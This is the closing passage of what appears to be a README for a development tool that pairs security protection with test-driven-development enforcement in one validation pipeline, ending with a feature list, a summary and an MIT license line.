- 🔄 Test result capture and integration
- 🔄 Red-Green-Refactor cycle enforcement

**Result**: A comprehensive development quality assurance system that provides both security protection and TDD enforcement in a single, unified validation pipeline.

## License

MIT License - See LICENSE file for details
